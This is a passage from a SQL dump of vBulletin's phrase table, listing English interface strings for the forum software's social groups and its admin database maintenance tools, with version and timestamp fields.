Description', 'vbulletin', 'vBulletin Solutions', 1192530673, '3.7.0 Beta 1'), (37405, -1, 'group_does_not_exist', 'socialgroups', 'That group does not exist', 'vbulletin', 'vBulletin Solutions', 1192527384, '3.7.0 Beta 1'), (37406, -1, 'group_has_no_discussions', 'socialgroups', 'This group does not have any discussions yet.', 'vbulletin', 'vBulletin Solutions', 1214228608, '3.7.1'), (37407, -1, 'group_icon_desc', 'socialgroups', 'Social group icons are small pictures representing a social group, which are displayed when viewing a social group or as a smaller version when browsing group listings.

Note: Your group will not show up in New Groups or Random Group on the group overview page unless you have uploaded an icon.', 'vbulletin', 'vBulletin Solutions', 1226322332, '3.8.0 Beta 2'), (37408, -1, 'group_icon_file_path_dfn', 'socialgroups', 'Social Group Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)', 'vbulletin', 'vBulletin Solutions', 1216899713, '3.8.0 Alpha 1'), (37409, -1, 'group_icons_are_currently_being_served_from_the_database', 'socialgroups', 'Social Group Icons are currently being served from the database', 'vbulletin', 'vBulletin Solutions', 1216899904, '3.8.0 Alpha 1'), (37410, -1, 'group_icons_are_currently_being_served_from_the_filesystem_at_x', 'socialgroups', 'Social group icons are currently being served from the filesystem at {1}', 'vbulletin', 'vBulletin Solutions', 1216899483, '3.8.0 Alpha 1'), (37411, -1, 'group_maintained_by', 'socialgroups', 'Group Maintained By', 'vbulletin', 'vBulletin Solutions', 1221135533, '3.8.0 Alpha 1'), (37412, -1, 'group_maintained_by_x', 'socialgroups', 'Group Maintained by {2}', 'vbulletin', 'vBulletin Solutions', 1221140437, '3.8.0 Alpha 1'), (37413, -1, 'group_options', 'socialgroups', 'Group Options', 'vbulletin', 'vBulletin Solutions', 1204716911, '3.7.0 Beta 6'), (37414, -1, 'group_ownership_transfer_request_sent_to_x', 'socialgroups', 'A request to transfer the ownership of this social group to {2} is in progress.
If you would like to transfer the group to another user you must first cancel this transfer request.

Would you like to do this now?', 'vbulletin', 'vBulletin Solutions', 1228128905, '3.8.0 Release Candidate 1'), (37415, -1, 'group_pictures', 'socialgroups', 'Group Pictures', 'vbulletin', 'vBulletin Solutions', 1195494143, '3.7.0 Beta 1'), (37416, -1, 'group_subscriptions', 'socialgroups', 'Group Subscriptions', 'vbulletin', 'vBulletin Solutions', 1234874310, '3.8.2'), (37417, -1, 'group_tools', 'socialgroups', 'Group Tools', 'vbulletin', 'vBulletin Solutions', 1213619855, '3.7.1'), (37418, -1, 'group_type', 'socialgroups', 'Group Type', 'vbulletin', 'vBulletin Solutions', 1196175197, '3.7.0 Beta 1'), (37419, -1, 'group_type_inviteonly', 'socialgroups', 'Invite Only', 'vbulletin', 'vBulletin Solutions', 1196175297, '3.7.0 Beta 1'), (37420, -1, 'group_type_moderated', 'socialgroups', 'Moderated', 'vbulletin', 'vBulletin Solutions', 1196175267, '3.7.0 Beta 1'), (37421, -1, 'group_type_public', 'socialgroups', 'Public', 'vbulletin', 'vBulletin Solutions', 1196175227, '3.7.0 Beta 1'), (37422, -1, 'groups_you_created', 'socialgroups', 'Groups You Created', 'vbulletin', 'vBulletin Solutions', 1218210630, '3.8.0 Alpha 1'), (37423, -1, 'in_category_x', 'socialgroups', 'in category {1}', 'vbulletin', 'vBulletin Solutions', 1217935252, '3.8.0 Alpha 1'), (37424, -1, 'invalid_username', 'socialgroups', 'The user you have specified was not found.', 'vbulletin', 'vBulletin Solutions', 1200321960, '3.7.0 Beta 4'), (37425, -1, 'invite', 'socialgroups', 'Invite', 'vbulletin', 'vBulletin Solutions', 1196252637, '3.7.0 Beta 1'), (37426, -1, 'invite_user', 'socialgroups', 'Invite User', 'vbulletin', 'vBulletin Solutions', 1196252610, '3.7.0 Beta 1'), (37427, -1, 'invited_users', 'socialgroups', 'Invited Users', 'vbulletin', 'vBulletin Solutions', 1196252513, '3.7.0 Beta 1'), (37428, -1, 'invited_users_description', 'socialgroups', 'The following users have been invited to this group', 'vbulletin', 'vBulletin Solutions', 1196939310, '3.7.0 Beta 1'), (37429, -1, 'is_in_category', 'socialgroups', 'Is in Category', 'vbulletin', 'vBulletin Solutions', 1215787498, '3.8.0 Alpha 1'), (37430, -1, 'join_group', 'socialgroups', 'Join Group', 'vbulletin', 'vBulletin Solutions', 1192527075, '3.7.0 Beta 1'), (37431, -1, 'join_group_question', 'socialgroups', 'Join Group?', 'vbulletin', 'vBulletin Solutions', 1195748203, '3.7.0 Beta 1'), (37432, -1, 'join_moderated_extratext', 'socialgroups', 'Please Note: This is a moderated group, your membership will need to be approved.', 'vbulletin', 'vBulletin Solutions', 1196960256, '3.7.0 Beta 1'), (37433, -1, 'joined_group', 'socialgroups', 'Joined', 'vbulletin', 'vBulletin Solutions', 1192456676, '3.7.0 Beta 1'), (37434, -1, 'kick_members', 'socialgroups', 'Remove Members', 'vbulletin', 'vBulletin Solutions', 1196956652, '3.7.0 Beta 1'), (37435, -1, 'kick_members_description', 'socialgroups', 'The following users are members of this group', 'vbulletin', 'vBulletin Solutions', 1196939438, '3.7.0 Beta 1'), (37436, -1, 'last_member_of_group', 'socialgroups', 'The only member left in this group is the owner.

The owner cannot be removed from a group.', 'vbulletin', 'vBulletin Solutions', 1196956613, '3.7.0 Beta 1'), (37437, -1, 'last_updated', 'socialgroups', 'Last Updated', 'vbulletin', 'vBulletin Solutions', 1217858584, '3.8.0 Alpha 1'), (37438, -1, 'leave_group_question', 'socialgroups', 'Leave Group?', 'vbulletin', 'vBulletin Solutions', 1195748214, '3.7.0 Beta 1'), (37439, -1, 'leave_social_group', 'socialgroups', 'Leave Group', 'vbulletin', 'vBulletin Solutions', 1207563063, '3.7.0 Release Candidate 3'), (37440, -1, 'manage_members', 'socialgroups', 'Manage Members', 'vbulletin', 'vBulletin Solutions', 1196252361, '3.7.0 Beta 1'), (37441, -1, 'may_add_pictures_group_paste_url', 'socialgroups', 'You may add pictures to this group from your albums. Paste the URL of each picture you want to add on a separate line. Alternatively, you can add pictures to this group by first viewing them in your albums and then selecting \"Add Pictures to Group\".', 'vbulletin', 'vBulletin Solutions', 1196464970, '3.7.0 Beta 1'), (37442, -1, 'member_list', 'socialgroups', 'Member List', 'vbulletin', 'vBulletin Solutions', 1192555221, '3.7.0 Beta 1'), (37443, -1, 'member_management', 'socialgroups', 'Member Management', 'vbulletin', 'vBulletin Solutions', 1196252476, '3.7.0 Beta 1'), (37444, -1, 'members_greater_than', 'socialgroups', 'Members Greater Than', 'vbulletin', 'vBulletin Solutions', 1200321974, '3.7.0 Beta 4'), (37445, -1, 'members_in_group_x', 'socialgroups', 'Members in Social Group {1}', 'vbulletin', 'vBulletin Solutions', 1194887147, '3.7.0 Beta 1'), (37446, -1, 'members_less_than', 'socialgroups', 'Members Less Than', 'vbulletin', 'vBulletin Solutions', 1200321987, '3.7.0 Beta 4'), (37447, -1, 'members_pending_moderation', 'socialgroups', 'Members Pending Moderation', 'vbulletin', 'vBulletin Solutions', 1196252547, '3.7.0 Beta 1'), (37448, -1, 'members_pending_moderation_description', 'socialgroups', 'The following users want to join this group', 'vbulletin', 'vBulletin Solutions', 1196939165, '3.7.0 Beta 1'), (37449, -1, 'messages_must_be_approved_by_owner', 'socialgroups', 'Messages must be approved by the owner', 'vbulletin', 'vBulletin Solutions', 1204717844, '3.7.0 Beta 6'), (37450, -1, 'moderated_social_group', 'socialgroups', 'Moderated Social Group', 'vbulletin', 'vBulletin Solutions', 1217858049, '3.8.0 Alpha 1'), (37451, -1, 'move_group_icons_from_database_into_filesystem', 'socialgroups', 'Move Social Group Icons from Database into File System', 'vbulletin', 'vBulletin Solutions', 1216899845, '3.8.0 Alpha 1'), (37452, -1, 'move_group_icons_from_filesystem_into_database', 'socialgroups', 'Move group icons from the filesystem into the database', 'vbulletin', 'vBulletin Solutions', 1216899597, '3.8.0 Alpha 1'), (37453, -1, 'move_group_icons_to_a_different_directory', 'socialgroups', 'Move group icons to a different directory', 'vbulletin', 'vBulletin Solutions', 1216899636, '3.8.0 Alpha 1'), (37454, -1, 'must_join_to_view', 'socialgroups', 'You need to be a member of this group to view its contents', 'vbulletin', 'vBulletin Solutions', 1204936512, '3.7.0 Release Candidate 1'), (37455, -1, 'new_discussion', 'socialgroups', 'Post New Discussion', 'vbulletin', 'vBulletin Solutions', 1212080549, '3.7.1'), (37456, -1, 'new_groups', 'socialgroups', 'New Groups', 'vbulletin', 'vBulletin Solutions', 1218210923, '3.8.0 Alpha 1'), (37457, -1, 'no_discussions_found', 'socialgroups', 'No discussions were found. Try different search terms.', 'vbulletin', 'vBulletin Solutions', 1214389652, '3.7.1'), (37458, -1, 'no_group_icon', 'socialgroups', 'No Social Group Icon Specified', 'vbulletin', 'vBulletin Solutions', 1216132966, '3.8.0 Alpha 1'), (37459, -1, 'no_groups_found', 'socialgroups', 'No Groups were Found', 'vbulletin', 'vBulletin Solutions', 1200322007, '3.7.0 Beta 4'), (37460, -1, 'no_groups_selected_or_invalid_input', 'socialgroups', 'No groups selected, or you have provided invalid input.', 'vbulletin', 'vBulletin Solutions', 1200322028, '3.7.0 Beta 4'), (37461, -1, 'no_groups_to_display', 'socialgroups', 'No Groups to Display', 'vbulletin', 'vBulletin Solutions', 1192453568, '3.7.0 Beta 1'), (37462, -1, 'no_pictures_added_group_yet', 'socialgroups', 'No pictures have been added to this group yet.', 'vbulletin', 'vBulletin Solutions', 1195494167, '3.7.0 Beta 1'), (37463, -1, 'no_results', 'socialgroups', 'No results found.', 'vbulletin', 'vBulletin Solutions', 1219746352, '3.8.0 Alpha 1'), (37464, -1, 'no_social_groups', 'socialgroups', 'There are no social groups.', 'vbulletin', 'vBulletin Solutions', 1223646809, '3.8.0 Beta 1'), (37465, -1, 'not_group_owner', 'socialgroups', 'You are not the group owner', 'vbulletin', 'vBulletin Solutions', 1192533807, '3.7.0 Beta 1'), (37466, -1, 'not_in_group', 'socialgroups', 'You are not a member of that group!', 'vbulletin', 'vBulletin Solutions', 1192463639, '3.7.0 Beta 1'), (37467, -1, 'number_of_groups_to_process_per_cycle', 'socialgroups', 'Number of Groups to process per cycle', 'vbulletin', 'vBulletin Solutions', 1216900926, '3.8.0 Alpha 1'), (37468, -1, 'one_url_per_line_paren', 'socialgroups', '(One URL per line)', 'vbulletin', 'vBulletin Solutions', 1195493666, '3.7.0 Beta 1'), (37469, -1, 'only_owner_can_create_discussions', 'socialgroups', 'Only the group owner can create new discussions', 'vbulletin', 'vBulletin Solutions', 1210937101, '3.7.1'), (37470, -1, 'only_owner_can_create_new_discussions', 'socialgroups', 'Only owner can create new discussions', 'vbulletin', 'vBulletin Solutions', 1214230220, '3.7.1'), (37471, -1, 'pending_and_invited_members', 'socialgroups', 'Pending & Invited Members', 'vbulletin', 'vBulletin Solutions', 1196949297, '3.7.0 Beta 1'), (37472, -1, 'pending_members', 'socialgroups', 'Pending Members', 'vbulletin', 'vBulletin Solutions', 1217605874, '3.8.0 Alpha 1'), (37473, -1, 'physically_remove_discussion', 'socialgroups', 'Physically Remove Discussion', 'vbulletin', 'vBulletin Solutions', 1214231885, '3.7.1'), (37474, -1, 'picture_urls', 'socialgroups', 'Picture URLs', 'vbulletin', 'vBulletin Solutions', 1195493643, '3.7.0 Beta 1'), (37475, -1, 'picture_x_of_y_from_group_z', 'socialgroups', 'Picture {1} of {2} from Group {3}', 'vbulletin', 'vBulletin Solutions', 1195559187, '3.7.0 Beta 1'), (37476, -1, 'pictures_from_group_x', 'socialgroups', 'Pictures from Group {1}', 'vbulletin', 'vBulletin Solutions', 1195559315, '3.7.0 Beta 1'), (37477, -1, 'pm_request_to_take_ownership_of_social_group_accepted_message', 'socialgroups', 'The user {1} has accepted a request to take ownership of the Social Group [url={2}/group.php?groupid={3}]{4}[/url].', 'vbulletin', 'vBulletin Solutions', 1221140016, '3.8.0 Alpha 1'), (37478, -1, 'pm_request_to_take_ownership_of_social_group_accepted_title', 'socialgroups', 'Request to Take Ownership of Social Group {1} Accepted', 'vbulletin', 'vBulletin Solutions', 1221139743, '3.8.0 Alpha 1'), (37479, -1, 'pm_request_to_take_ownership_of_social_group_message', 'socialgroups', 'A request has been made for you to take ownership of the Social Group [url={1}/group.php?groupid={2}]{3}[/url].\r\n\r\n[url={1}/group.php?groupid={2}&do=accepttransfer]Click here to accept or reject this request[/url].', 'vbulletin', 'vBulletin Solutions', 1221137582, '3.8.0 Alpha 1'), (37480, -1, 'pm_request_to_take_ownership_of_social_group_title', 'socialgroups', 'Request to Take Ownership of Social Group {1}', 'vbulletin', 'vBulletin Solutions', 1221133040, '3.8.0 Alpha 1'), (37481, -1, 'post_new_discussion', 'socialgroups', 'Post New Discussion', 'vbulletin', 'vBulletin Solutions', 1221755097, '3.8.0 Alpha 1'), (37482, -1, 'prune_social_groups', 'socialgroups', 'Prune Social Groups', 'vbulletin', 'vBulletin Solutions', 1200322087, '3.7.0 Beta 4'), (37483, -1, 'random_group', 'socialgroups', 'Random Group', 'vbulletin', 'vBulletin Solutions', 1218104874, '3.8.0 Alpha 1'), (37484, -1, 'remove_from_group', 'socialgroups', 'Remove from group', 'vbulletin', 'vBulletin Solutions', 1195559224, '3.7.0 Beta 1'), (37485, -1, 'remove_picture_from_group', 'socialgroups', 'Remove Picture from Group', 'vbulletin', 'vBulletin Solutions', 1195493784, '3.7.0 Beta 1'), (37486, -1, 'reply_to_discussion', 'socialgroups', 'Reply to Discussion', 'vbulletin', 'vBulletin Solutions', 1232113427, '3.8.1'), (37487, -1, 'report_group_message', 'socialgroups', 'Report Social Group Message', 'vbulletin', 'vBulletin Solutions', 1195594737, '3.7.0 Beta 1'), (37488, -1, 'request_transfer', 'socialgroups', 'Request Transfer', 'vbulletin', 'vBulletin Solutions', 1220974925, '3.8.0 Alpha 1'), (37489, -1, 'search_discussions', 'socialgroups', 'Search Discussions', 'vbulletin', 'vBulletin Solutions', 1214387137, '3.7.1'), (37490, -1, 'search_groups', 'socialgroups', 'Search Groups', 'vbulletin', 'vBulletin Solutions', 1193143047, '3.7.0 Beta 1'), (37491, -1, 'search_social_groups', 'socialgroups', 'Search Social Groups', 'vbulletin', 'vBulletin Solutions', 1200322106, '3.7.0 Beta 4'), (37492, -1, 'select_a_category', 'socialgroups', 'Select a Category', 'vbulletin', 'vBulletin Solutions', 1215698028, '3.8.0 Alpha 1'), (37493, -1, 'select_destination_category', 'socialgroups', 'Select Destination Category', 'vbulletin', 'vBulletin Solutions', 1215686626, '3.8.0 Alpha 1'), (37494, -1, 'selected_discussions', 'socialgroups', 'Selected Discussions', 'vbulletin', 'vBulletin Solutions', 1214299802, '3.7.1'), (37495, -1, 'selected_groups', 'socialgroups', 'Selected Groups', 'vbulletin', 'vBulletin Solutions', 1234873010, '3.8.2'), (37496, -1, 'showing_discussions_x_of_y', 'socialgroups', 'Showing Discussions {1} of {2}', 'vbulletin', 'vBulletin Solutions', 1210938694, '3.7.1'), (37497, -1, 'showing_discussions_x_to_y_of_z', 'socialgroups', 'Showing Discussions {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1210938653, '3.7.1'), (37498, -1, 'showing_gms_x_to_y_of_z', 'socialgroups', 'Showing Social Group Messages {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1196339431, '3.7.0 Beta 1'), (37499, -1, 'showing_x_of_y_members', 'socialgroups', 'Showing {1} of {2} Member(s)', 'vbulletin', 'vBulletin Solutions', 1205922396, '3.7.0 Release Candidate 1'), (37500, -1, 'showing_x_of_y_pictures', 'socialgroups', 'Showing {1} of {2} Picture(s)', 'vbulletin', 'vBulletin Solutions', 1205922409, '3.7.0 Release Candidate 1'), (37501, -1, 'skip', 'socialgroups', 'Skip', 'vbulletin', 'vBulletin Solutions', 1227095793, '3.8.0 Beta 3'), (37502, -1, 'social_group', 'socialgroups', 'Social Group', 'vbulletin', 'vBulletin Solutions', 1193231324, '3.7.0 Beta 1'), (37503, -1, 'social_group_categories', 'socialgroups', 'Social Group Categories', 'vbulletin', 'vBulletin Solutions', 1215686687, '3.8.0 Alpha 1'), (37504, -1, 'social_group_category', 'socialgroups', 'Social Group Category', 'vbulletin', 'vBulletin Solutions', 1215698315, '3.8.0 Alpha 1'), (37505, -1, 'social_group_discussion', 'socialgroups', 'Social Group Discussion', 'vbulletin', 'vBulletin Solutions', 1210938391, '3.7.1'), (37506, -1, 'social_group_discussions_in_x', 'socialgroups', 'Social Group Discussions in: {1}', 'vbulletin', 'vBulletin Solutions', 1214223225, '3.7.1'), (37507, -1, 'social_group_icon', 'socialgroups', 'Social Group Icon', 'vbulletin', 'vBulletin Solutions', 1216899326, '3.8.0 Alpha 1'), (37508, -1, 'social_group_icons', 'socialgroups', 'Social Group Icons', 'vbulletin', 'vBulletin Solutions', 1216900222, '3.8.0 Alpha 1'), (37509, -1, 'social_group_icons_manager', 'socialgroups', 'Social Group Icons Manager', 'vbulletin', 'vBulletin Solutions', 1216900355, '3.8.0 Alpha 1'), (37510, -1, 'social_groups', 'socialgroups', 'Social Groups', 'vbulletin', 'vBulletin Solutions', 1192453974, '3.7.0 Beta 1'), (37511, -1, 'subscribe_to_this_discussion', 'socialgroups', 'Subscribe to This Discussion', 'vbulletin', 'vBulletin Solutions', 1213716885, '3.7.1'), (37512, -1, 'subscribe_to_this_group', 'socialgroups', 'Subscribe to This Group', 'vbulletin', 'vBulletin Solutions', 1213716860, '3.7.1'), (37513, -1, 'subscribed_discussions', 'socialgroups', 'Subscribed Discussions', 'vbulletin', 'vBulletin Solutions', 1214240622, '3.7.1'), (37514, -1, 'successfully_requested_group_transfer', 'socialgroups', 'A transfer request has been sent.', 'vbulletin', 'vBulletin Solutions', 1220980489, '3.8.0 Alpha 1'), (37515, -1, 'the_following_pictures_added_group_successfully', 'socialgroups', 'The following pictures were added to this group successfully:', 'vbulletin', 'vBulletin Solutions', 1195469992, '3.7.0 Beta 1'), (37516, -1, 'the_following_pictures_already_part_group', 'socialgroups', 'The following pictures were already part of this group:', 'vbulletin', 'vBulletin Solutions', 1195470006, '3.7.0 Beta 1'), (37517, -1, 'this_person_is_already_a_member_of_the_group', 'socialgroups', 'This person is already a member of the group', 'vbulletin', 'vBulletin Solutions', 1196947290, '3.7.0 Beta 1'), (37518, -1, 'this_user_is_not_allowed_to_join_groups', 'socialgroups', 'This user is not allowed to join Social Groups', 'vbulletin', 'vBulletin Solutions', 1196959578, '3.7.0 Beta 1'), (37519, -1, 'transfer_group', 'socialgroups', 'Transfer Group', 'vbulletin', 'vBulletin Solutions', 1221141475, '3.8.0 Alpha 1'), (37520, -1, 'transfer_group_ownership', 'socialgroups', 'Transfer Group Ownership', 'vbulletin', 'vBulletin Solutions', 1220974581, '3.8.0 Alpha 1'), (37521, -1, 'transfer_group_ownership_info', 'socialgroups', 'If you no longer wish to maintain this social group, you may request another user to take ownership of it instead. Enter the name of the user you would like to transfer the ownership of the social group to.

\r\nThe user that you request to transfer the group to will receive a private message and an option to confirm the transfer. You may cancel the transfer until the target user has confirmed that they will take over the social group for you.', 'vbulletin', 'vBulletin Solutions', 1220974825, '3.8.0 Alpha 1'), (37522, -1, 'transfer_to_user', 'socialgroups', 'Transfer to User', 'vbulletin', 'vBulletin Solutions', 1220974739, '3.8.0 Alpha 1'), (37523, -1, 'unapprove_discussions', 'socialgroups', 'Unapprove Discussions', 'vbulletin', 'vBulletin Solutions', 1212160033, '3.7.1'), (37524, -1, 'undelete_discussions', 'socialgroups', 'Undelete Discussions', 'vbulletin', 'vBulletin Solutions', 1212159958, '3.7.1'), (37525, -1, 'unsubscribe_from_this_discussion', 'socialgroups', 'Unsubscribe from this Discussion', 'vbulletin', 'vBulletin Solutions', 1213718363, '3.7.1'), (37526, -1, 'unsubscribe_from_this_group', 'socialgroups', 'Unsubscribe from this Group', 'vbulletin', 'vBulletin Solutions', 1213718396, '3.7.1'), (37527, -1, 'url_to_group_icons_relative_to_your_forums_home_page', 'socialgroups', 'URL to Social Group Icons (Relative to your forums home page)', 'vbulletin', 'vBulletin Solutions', 1216900429, '3.8.0 Alpha 1'), (37528, -1, 'user_already_owns_group', 'socialgroups', 'User already has ownership of this group', 'vbulletin', 'vBulletin Solutions', 1236771391, '3.8.2'), (37529, -1, 'user_cannot_own_any_more_social_groups', 'socialgroups', 'User cannot own any more social groups.', 'vbulletin', 'vBulletin Solutions', 1221131730, '3.8.0 Alpha 1'), (37530, -1, 'user_does_not_exist', 'socialgroups', 'User does not exist', 'vbulletin', 'vBulletin Solutions', 1196252389, '3.7.0 Beta 1'), (37531, -1, 'user_does_not_have_permission_to_own_social_groups', 'socialgroups', 'User does not have permission to own social groups.', 'vbulletin', 'vBulletin Solutions', 1221130026, '3.8.0 Alpha 1'), (37532, -1, 'users_must_join_to_view_content', 'socialgroups', 'Users must join to view the content', 'vbulletin', 'vBulletin Solutions', 1204717873, '3.7.0 Beta 6'), (37533, -1, 'view_all_categories', 'socialgroups', 'View All Categories', 'vbulletin', 'vBulletin Solutions', 1217858777, '3.8.0 Alpha 1'), (37534, -1, 'view_all_groups', 'socialgroups', 'View All Groups', 'vbulletin', 'vBulletin Solutions', 1217605994, '3.8.0 Alpha 1'), (37535, -1, 'view_all_members', 'socialgroups', 'View All Members', 'vbulletin', 'vBulletin Solutions', 1193132481, '3.7.0 Beta 1'), (37536, -1, 'view_next', 'socialgroups', 'View Next', 'vbulletin', 'vBulletin Solutions', 1217858653, '3.8.0 Alpha 1'), (37537, -1, 'view_previous', 'socialgroups', 'View Previous', 'vbulletin', 'vBulletin Solutions', 1218029723, '3.8.0 Alpha 1'), (37538, -1, 'we_are_ready_to_attempt_to_move_your_group_icons_from_database_to_filesystem', 'socialgroups', '

We are ready to attempt to move your Social Group Icons from the Database to the Filesystem.

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', 'vBulletin Solutions', 1216900146, '3.8.0 Alpha 1'), (37539, -1, 'we_are_ready_to_attempt_to_move_your_group_icons_from_filesystem_to_database', 'socialgroups', '

We are ready to attempt to move your Social Group Icons from the Filesystem to the Database.

It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

', 'vbulletin', 'vBulletin Solutions', 1216900095, '3.8.0 Alpha 1'), (37540, -1, 'x_awaiting_moderation', 'socialgroups', '{1} awaiting moderation', 'vbulletin', 'vBulletin Solutions', 1200322122, '3.7.0 Beta 4'), (37541, -1, 'x_groups', 'socialgroups', '{1} groups', 'vbulletin', 'vBulletin Solutions', 1215698267, '3.8.0 Alpha 1'), (37542, -1, 'x_members', 'socialgroups', '{1} member(s)', 'vbulletin', 'vBulletin Solutions', 1200322137, '3.7.0 Beta 4'), (37543, -1, 'you_are_not_a_member_of_any_groups', 'socialgroups', 'You are not a member of any groups', 'vbulletin', 'vBulletin Solutions', 1192453832, '3.7.0 Beta 1'), (37544, -1, 'you_are_not_the_owner', 'socialgroups', 'You are not the Owner of this group', 'vbulletin', 'vBulletin Solutions', 1192529688, '3.7.0 Beta 1'), (37545, -1, 'you_did_not_select_any_groups', 'socialgroups', 'You did not select any groups.', 'vbulletin', 'vBulletin Solutions', 1200322152, '3.7.0 Beta 4'), (37546, -1, 'you_have_no_subscribed_discussions', 'socialgroups', 'You have not subscribed to any discussions', 'vbulletin', 'vBulletin Solutions', 1214240525, '3.7.1'), (37547, -1, 'your_groups', 'socialgroups', 'Your Groups', 'vbulletin', 'vBulletin Solutions', 1218210739, '3.8.0 Alpha 1'), (37548, -1, 'your_groups_in_need_of_attention', 'socialgroups', 'Your Groups In Need Of Attention', 'vbulletin', 'vBulletin Solutions', 1199912044, '3.7.0 Beta 4'), (37549, -1, 'your_groups_with_moderated_messages', 'socialgroups', 'Your Groups with Moderated Messages', 'vbulletin', 'vBulletin Solutions', 1219746270, '3.8.0 Alpha 1'), (37550, -1, 'your_invites', 'socialgroups', 'Your Invites', 'vbulletin', 'vBulletin Solutions', 1199911978, '3.7.0 Beta 4'), (37551, -1, 'add_column_names', 'sql', 'Add Column Names', 'vbulletin', '', 0, ''), (37552, -1, 'affected_rows', 'sql', 'Affected Rows: {1} ({2}s)', 'vbulletin', '', 0, ''), (37553, -1, 'all_unique_indexes_checked', 'sql', 'All unique indexes checked and corrected as necessary.

Click the Proceed button to return to the main repair page.', 'vbulletin', '', 0, ''), (37554, -1, 'allow_vcard_download', 'sql', 'Allow vCard Download', 'vbulletin', '', 0, ''), (37555, -1, 'an_error_occured_while_attempting_to_run_your_query', 'sql', 'An error occurred while attempting to execute your query. The following information was returned.\r\n
error number: {1}\r\n
error desc: {2}', 'vbulletin', '', 0, ''), (37556, -1, 'auto_query', 'sql', 'Automatic QueryHelpful, predefined queries for mass updating the settings of users and posts. Once a query is executed it can not be reversed.', 'vbulletin', '', 0, ''), (37557, -1, 'backup_database_to_a_file_on_the_server', 'sql', 'Backup database to a file on the server', 'vbulletin', '', 0, ''), (37558, -1, 'backup_file_warning', 'sql', 'Warning: The file path specified here will save the backup within the web root, meaning that anybody can download it. We recommend that you specify a more secure location to store your backup.', 'vbulletin', '', 0, ''), (37559, -1, 'confirm_query_execution', 'sql', 'Confirm Query Execution', 'vbulletin', '', 0, ''), (37560, -1, 'convert_tables_from_x_to_y', 'sql', 'Convert Tables From {1} to {2}', 'vbulletin', '', 0, ''), (37561, -1, 'convert_x_from_y_to_z', 'sql', 'Convert {1} From {2} to {3}', 'vbulletin', '', 0, ''), (37562, -1, 'creating_unique_index', 'sql', 'Creating unique index...', 'vbulletin', '', 0, ''), (37563, -1, 'csv_backup_of_single_database_table', 'sql', 'CSV backup of single database table', 'vbulletin', '', 0, ''), (37564, -1, 'data_length', 'sql', 'Data Length', 'vbulletin', '', 0, ''), (37565, -1, 'database_table_to_include_in_backup', 'sql', 'Database tables to include in backup', 'vbulletin', '', 0, ''), (37566, -1, 'deleted_duplicate_occurence', 'sql', 'Deleted duplicate occurrence', 'vbulletin', '', 0, ''), (37567, -1, 'display_avatars', 'sql', 'Display Avatars', 'vbulletin', '', 0, ''), (37568, -1, 'display_email', 'sql', 'Display Email', 'vbulletin', '', 0, ''), (37569, -1, 'display_images', 'sql', 'Display Images', 'vbulletin', '', 0, ''), (37570, -1, 'display_reputation', 'sql', 'Display Reputation', 'vbulletin', '', 0, ''), (37571, -1, 'display_signatures', 'sql', 'Display Signatures', 'vbulletin', '', 0, ''), (37572, -1, 'dropping_non_unique_index', 'sql', 'Dropping non-unique index...', 'vbulletin', '', 0, ''), (37573, -1, 'execute_sql_query', 'sql', 'Execute SQL Query', 'vbulletin', '', 0, ''), (37574, -1, 'fix_unique_indexes', 'sql', 'Fix Unique Indexes', 'vbulletin', '', 0, ''), (37575, -1, 'fix_unique_indexes_intro', 'sql', ' If for whatever reason the UNIQUE indexes in your database\r\n have been lost (usually this happens after importing an\r\n incomplete or corrupt SQL dump) you may find strange behavior,\r\n particularly when using the language and template systems.
\r\n
\r\n This system will attempt to correct the problem and rebuild your\r\n UNIQUE indexes.
\r\n
\r\n Please ensure that the mysql-schema.php file is present\r\n in the install folder on your web server before continuing.', 'vbulletin', '', 0, ''), (37576, -1, 'found_x_duplicate_record_occurences', 'sql', 'Found {1} duplicate record occurrences', 'vbulletin', '', 0, ''), (37577, -1, 'index_length', 'sql', 'Index Length', 'vbulletin', '', 0, ''), (37578, -1, 'invisible_mode', 'sql', 'Invisible Mode', 'vbulletin', '', 0, ''), (37579, -1, 'isam_tables', 'sql', 'ISAM Tables', 'vbulletin', '', 0, ''), (37580, -1, 'manual_query', 'sql', 'Manual QueryOnly one query can be run at a time. Once a query is executed it can not be reversed', 'vbulletin', '', 0, ''), (37581, -1, 'newest_first', 'sql', 'Newest First', 'vbulletin', '', 0, ''), (37582, -1, 'oldest_first', 'sql', 'Oldest First', 'vbulletin', '', 0, ''), (37583, -1, 'optimize_tables', 'sql', 'Optimize Tables', 'vbulletin', '', 0, ''), (37584, -1, 'overhead', 'sql', 'Overhead', 'vbulletin', '', 0, ''), (37585, -1, 'path_and_file_to_save_backup_to', 'sql', 'Path and name of file to save backup to:Your web server must have access to write to this directory (usually chmod 0777)', 'vbulletin', '', 0, ''), (37586, -1, 'php_backup_warning', 'sql', 'Database backup via PHP is only recommended for those with small databases as timeouts may occur. Saving to the server or backup via command line is more reliable.', 'vbulletin', '', 0, ''), (37587, -1, 'query', 'sql', 'Query', 'vbulletin', '', 0, ''), (37588, -1, 'query_may_modify_database', 'sql', 'This query may modify data in your database. If this change is done in error, it is possible that you will not be able to recover from this change. Are you sure you wish to continue?', 'vbulletin', '', 0, ''), (37589, -1, 'quote_character', 'sql', 'Quote Character', 'vbulletin', '', 0, ''), (37590, -1, 'receive_admin_emails', 'sql', 'Receive Admin Emails', 'vbulletin', '', 0, ''), (37591, -1, 'receive_private_messages', 'sql', 'Receive Private Messages', 'vbulletin', '', 0, ''), (37592, -1, 'repair_optimize_tables', 'sql', 'Repair / Optimize Tables', 'vbulletin', '', 0, ''), (37593, -1, 'repair_tables', 'sql', 'Repair Tables', 'vbulletin', '', 0, ''), (37594, -1, 'replacing_unique_index_on_table_x', 'sql', 'Replacing unique index on table {1}', 'vbulletin', '', 0, ''), (37595, -1, 'results_to_show_per_page', 'sql', 'Results to Show Per Page', 'vbulletin', '', 0, ''), (37596, -1, 'results_x_y', 'sql', 'Results: {1} ({2}s)', 'vbulletin', '', 0, ''), (37597, -1, 'send_notification_email_when_a_private_message_is_received', 'sql', 'Send Notification Email When a Private Message is Received', 'vbulletin', '', 0, ''), (37598, -1, 'separator_character', 'sql', 'Separator Character', 'vbulletin', '', 0, ''), (37599, -1, 'show_enhanced_editor_toolbar', 'sql', 'Show Enhanced (WYSIWYG) Editor Toolbar', 